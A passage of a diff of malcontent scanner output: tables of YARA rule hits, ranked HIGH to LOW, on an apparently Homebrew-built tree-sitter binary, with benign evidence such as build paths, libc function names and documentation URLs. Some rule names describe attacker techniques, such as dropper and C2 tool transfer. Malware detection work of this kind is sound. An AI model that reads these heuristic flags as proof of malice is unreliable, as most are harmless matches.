[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | 
+|--------|-----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH 
| [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | 
[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
